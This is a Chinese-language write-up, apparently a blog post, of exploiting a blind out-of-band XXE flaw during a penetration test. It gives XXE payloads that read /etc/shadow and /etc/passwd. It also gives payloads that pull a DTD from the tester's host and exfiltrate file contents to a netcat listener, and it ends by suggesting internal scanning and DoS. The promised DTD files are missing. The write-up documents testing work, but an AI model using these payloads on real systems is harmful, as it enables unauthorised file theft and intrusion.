0x01背景：

kaiputenku大佬最近在挖洞的时候偶遇一枚XXE漏洞，身经百战的他经过一番爱恨纠缠，终将她顺利拿下~

0x02纠缠一番只为她-Blind OOB XXE：

         在测试某系统的某查询功能模块如下：

• 查询模块.jpg(请各位大佬自行脑补)

• 下面即将开始kaiputenku的表演：

首先使用burp抓包，发现提交xml形式的数据包，很容易想到可能存在XML外部实体注入

  尝试构造以下payload读取/etc/shadow文件：

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [<!ENTITY file SYSTEM "file:///etc/shadow">]><root>&file;</root>

HTTP回显报错Permission denied，说明payload成功执行，证明确实存在XML外部实体注入，只是用户权限不足读取失败

尝试构造以下payload读取/etc/passwd文件

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [<!ENTITY file SYSTEM "file:///etc/passwd">]><root>&file;</root>

发现HTTP回显正常，但是没有我们想要的passwd文件信息，说明是Blind XXE漏洞

Blind XXE漏洞有两种常见的利用方式，ftp读回显和http读回显

• 尝试ftp读回显

测试主机ip为10.xx.xx.31

1）在测试主机上开启Web服务，并创建eval.dtd文件，内容如下

2）在测试主机上下载并运行xxe-ftp-server.rb，运行后会在2121端口开启ftp服务，脚本下载地址：https://github.com/ONsec-Lab/scripts

3）构造如下payload并发起请求

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE a[<!ENTITY % asd SYSTEM "http://10.xx.xx.31:8080/evil.dtd">%asd;%c;]><a>&rrr;</a>

发现HTTP回显Connection refused

在测试主机Web日志中发现目标主机已经成功下载了evil.dtd文件，但是HTTP又回显Connection refused，猜测是ftp服务的问题

直接在浏览器中访问http://10.xx.xx.31:2121/，发现连接被拒绝，这里没搞不明白为什么已经开启了ftp服务并且正在监听[::]:2121还是拒绝连接，换了台测试主机出现同样的问题，花了很长时间没有解决，猜测是内部网络策略的问题，遂放弃，准备尝试HTTP读回显的方式。

• 尝试http读回显

测试主机ip为10.xx.xx.31

1）在测试主机上开启Web服务，并创建eval.dtd文件，内容如下

2）使用nc进行监听，执行necat.exe -lvvp 8081，监听8081端口

3）构造如下payload并发起请求

<!DOCTYPE convert[<!ENTITY % remote SYSTEM "http://10.xx.x.31:8080/evil.dtd">%remote;%int;%send;]>

发现HTTP回显Illegal character in URL，说明该payload成功读取到/etc/passwd文件，尝试将/etc/passwd拼接到URL：'http：//10.xx.xx.31:8081?p=%file;'，但是由于passwd文件中的数据不符合URL构造要求，所以目标主机报Illegal character in URL的错误

所以开始尝试读取较为简单，文本信息较少的文件，比如/etc/hostname文件，里面只是保存了主机名，应该不会有什么特殊字符导致URL不合法

修改测试主机中的evil.dtd文件如下：

再次请求payload，发现该请求一直处于Waiting状态

并且发现necat.exe成功监听到目标主机的Web请求，并且在URL中读取到/etc/hostname文件信息，目标主机名为gp13erxxxxxxx36

0x03总结：

以上即为测试该漏洞的全部过程，由于处于全内网环境，寻找下载工具花了较长时间，ftp拒绝连接的坑也花费了很长时间，最后还是没有解决--.--。但是变通使用necat监听http请求成功读取到了目标主机的文件信息。

当然还有很多玩法，比如内网主机、端口存活扫描，DOS等，大家自己探索~